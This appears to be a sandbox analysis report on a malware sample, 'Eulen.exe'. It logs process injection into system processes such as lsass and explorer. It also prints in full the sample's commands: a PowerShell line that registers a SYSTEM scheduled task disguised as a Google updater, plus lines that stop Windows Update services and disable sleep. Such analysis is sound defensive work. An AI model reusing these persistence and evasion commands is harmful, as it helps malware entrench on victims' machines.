Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 23C03DC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2AFCF1D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C09C9C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 247BA250000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 276A09D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3F50000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D742A40000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D1D4C70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 17E6C720000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D2B1A80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 238A5DD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 23606140000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\powercfg.exe base: 26FCFC60000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\powercfg.exe base: 1E7F15B0000 value starts with: 4D5A	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 4084 base: 8790000 value: 4D

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Eulen.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Section loaded: NULL target: unknown protection: readonly
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Section loaded: NULL target: unknown protection: readonly
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Section loaded: NULL target: unknown protection: readonly

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Eulen.exe	Thread register set: target process: 8080	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Thread register set: target process: 7172
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Thread register set: target process: 5072
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Thread register set: target process: 6080

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Eulen.exe	Memory written: C:\Windows\System32\dialer.exe base: D3159B010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 158709A0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 26DB1590000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2917C380000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22382760000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1486AD40000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 269B9FD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22054D80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C57DA0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A333B40000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3EE0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F174530000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23315740000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1876D540000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15104330000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22308E70000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E731800000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: D50000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 209D2560000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0C10000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2036E5A0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2671A930000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 282A2110000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 2537C620000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29B59750000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 8790000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21744F70000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F02ED50000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 23C03DC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2AFCF1D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C09C9C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 247BA250000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 276A09D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3F50000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D742A40000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D1D4C70000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 17E6C720000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D2B1A80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 238A5DD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 23606140000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\powercfg.exe base: 26FCFC60000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\powercfg.exe base: 1E7F15B0000	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Memory written: C:\Windows\System32\dialer.exe base: A15B1CB010
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Memory written: C:\Windows\System32\dialer.exe base: 351ACCF010
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Memory written: C:\Windows\System32\dialer.exe base: 3D7804D010

Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe "C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process created: unknown unknown

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#gymatom#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\application\chromeupdater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\application\chromeupdater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#gymatom#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\application\chromeupdater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\application\chromeupdater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }			Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF647341C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

14_2_00007FF647341C64

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF647341C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

14_2_00007FF647341C64

Source: dwm.exe, 00000018.00000002.2720998109.0000026DAA594000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.1554261885.0000026DAA594000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 00000013.00000002.2692383953.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000000.1535559893.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.2723223741.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000013.00000002.2692383953.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000000.1535559893.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.2723223741.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000013.00000002.2692383953.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000000.1535559893.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.2723223741.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: winlogon.exe, 00000013.00000002.2692383953.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000000.1535559893.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.2723223741.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\winlogon.exe

Code function: 19_2_000002E9917314A0 cpuid

19_2_000002E9917314A0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
